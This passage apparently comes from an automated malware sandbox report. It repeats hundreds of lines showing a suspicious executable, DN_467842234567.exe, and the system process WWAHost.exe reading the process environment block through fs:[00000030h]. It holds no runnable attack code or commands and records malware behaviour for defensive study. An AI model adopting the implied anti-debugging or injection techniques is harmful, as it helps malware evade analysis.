          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03858794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0390138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03915BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0390131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03888EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03878E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03858A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03863A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03883D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03867D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h]
